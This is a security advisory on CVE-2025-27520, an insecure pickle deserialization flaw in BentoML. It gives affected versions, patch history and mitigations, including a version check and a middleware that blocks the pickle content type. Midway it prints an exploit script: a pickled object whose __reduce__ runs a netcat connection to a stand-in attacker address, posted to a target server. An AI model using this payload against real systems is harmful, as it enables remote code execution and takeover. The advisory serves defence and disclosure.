Advisory

Critical remote code execution vulnerability reported in BentoML

Take action: Exploitation is nearly trivial, and any internet-exposed platform running a vulnerable BentoML version is at risk. If you use BentoML, upgrade to version 1.4.3 or later immediately. If you cannot upgrade right away, consider a WAF rule or request-processing logic that blocks requests whose Content-Type header contains "application/vnd.bentoml+pickle". The workaround may break legitimate traffic and may not fully remove the risk, so treat it as a stopgap only.


Learn More

A critical security vulnerability has been discovered in BentoML, a Python library for building AI application serving systems and running model inference.

The vulnerability is tracked as CVE-2025-27520 (CVSS score 9.8), and allows unauthenticated attackers to execute arbitrary code remotely by sending malicious data payloads to vulnerable servers. The vulnerability stems from an insecure deserialization issue in the deserialize_value() function within the serde.py file. This function processes input data without proper validation, allowing attackers to inject malicious payloads that execute arbitrary code when deserialized:

def deserialize_value(self, payload: Payload) -> t.Any: 
    if "buffer-lengths" not in payload.metadata: 
        return pickle.loads(b"".join(payload.data))
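
To see why passing request bytes straight to pickle.loads is dangerous, here is a harmless sketch (the Demo class is hypothetical and not part of BentoML). It shows that the pickled data, not the receiving code, chooses which callable runs during deserialization; here that callable is the benign built-in sorted:

```python
import pickle


class Demo:
    """Hypothetical class used only to illustrate pickle's __reduce__ hook."""

    def __reduce__(self):
        # Tell pickle to "rebuild" this object by calling sorted([3, 1, 2]).
        return (sorted, ([3, 1, 2],))


data = pickle.dumps(Demo())

# Unpickling calls sorted([3, 1, 2]); no Demo instance is ever created.
result = pickle.loads(data)
print(result)  # [1, 2, 3]
```

Replacing sorted with a function that runs commands is all it takes to turn this mechanism into code execution, which is why untrusted input should never reach pickle.loads.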

While the initial advisory reported versions 1.3.4 through 1.4.2 as vulnerable, Checkmarx Zero analysts have determined that the vulnerability actually affects versions 1.3.8 through 1.4.2. This discrepancy arose because the vulnerability is a reintroduction of a previously patched issue (CVE-2024-2912):

  • Original vulnerability (CVE-2024-2912) was patched in version 1.2.5
  • The fix was inadvertently removed in version 1.3.8 (commit 045001c3)
  • The same issue resurfaced as CVE-2025-27520
  • Now patched again in version 1.4.3 (fix commit b35f4f4f)
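
The timeline above can be turned into a quick version check. This is a minimal sketch that assumes the Checkmarx Zero range (1.3.8 through 1.4.2) and plain "X.Y.Z" version strings; the function names are illustrative, and pre-release suffixes such as "rc1" are not handled:

```python
FIRST_AFFECTED = (1, 3, 8)  # fix inadvertently removed in this release
FIRST_FIXED = (1, 4, 3)     # fix restored in this release


def parse_version(text):
    """Parse a plain 'X.Y.Z' string into a tuple of ints."""
    return tuple(int(part) for part in text.split(".")[:3])


def affected_by_cve_2025_27520(version_text):
    """Return True if the version falls in the assumed affected range."""
    return FIRST_AFFECTED <= parse_version(version_text) < FIRST_FIXED


for candidate in ("1.3.7", "1.3.8", "1.4.2", "1.4.3"):
    print(candidate, affected_by_cve_2025_27520(candidate))
```

On a host with BentoML installed, the version string could be obtained with importlib.metadata.version("bentoml") from the standard library. Note that this check covers only CVE-2025-27520; releases before 1.2.5 are affected by the original CVE-2024-2912.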

Attackers can exploit this vulnerability by crafting a malicious pickle payload: a Python object whose __reduce__ magic method is overridden to run system commands when the object is deserialized. They then send the payload to a vulnerable BentoML server in an HTTP request.

Example exploitation code:

import pickle 
import os 
import requests 
 
headers = {'Content-Type': 'application/vnd.bentoml+pickle'} 
 
class Evil: 
   def __reduce__(self): 
       # start a netcat connection back to attacker-controlled host
       return(os.system, ('nc 256.98.36.121 1234',)) 
 
payload = pickle.dumps(Evil()) 
 
# send malicious request to target server running BentoML-based application
requests.post("http://256.98.36.123:3000/summarize",
              data=payload, headers=headers)

If successfully exploited, the vulnerability lets attackers execute arbitrary code on the server with the privileges of the running Python application, take control of the affected system, and conduct further attacks against the networks and services connected to it.

The most effective solution is to upgrade to BentoML version 1.4.3 or later, which blocks HTTP requests with the "application/vnd.bentoml+pickle" Content-Type.

If immediate upgrading is not possible, a temporary workaround involves configuring a Web Application Firewall (WAF) to block HTTP requests containing the "application/vnd.bentoml+pickle" Content-Type and serialized data in the request body. This approach may not fully eliminate the risk and should be thoroughly tested to avoid blocking legitimate application traffic.
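
Where a WAF is not available, the same Content-Type filtering could be approximated in request-processing logic. The following is a minimal sketch written as a generic ASGI middleware; the class and function names are hypothetical, the 415 response is an arbitrary choice, and how (or whether) it can be attached to a given BentoML deployment is an assumption that must be verified and tested:

```python
BLOCKED_MEDIA_TYPE = b"application/vnd.bentoml+pickle"


def is_blocked_content_type(headers):
    """headers: iterable of (name, value) byte pairs, as in an ASGI scope."""
    for name, value in headers:
        if name.lower() == b"content-type" and BLOCKED_MEDIA_TYPE in value.lower():
            return True
    return False


class BlockPickleMiddleware:
    """Hypothetical ASGI middleware that rejects pickle-typed HTTP requests."""

    def __init__(self, app):
        self.app = app

    async def __call__(self, scope, receive, send):
        if scope["type"] == "http" and is_blocked_content_type(scope.get("headers", [])):
            # Reject before the body ever reaches the wrapped application.
            await send({
                "type": "http.response.start",
                "status": 415,
                "headers": [(b"content-type", b"text/plain")],
            })
            await send({"type": "http.response.body", "body": b"Unsupported Media Type"})
            return
        await self.app(scope, receive, send)
```

The check is case-insensitive and matches on a substring, so values such as "application/vnd.bentoml+pickle; charset=utf-8" are also rejected. Like the WAF rule, this is a stopgap and not a substitute for upgrading.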
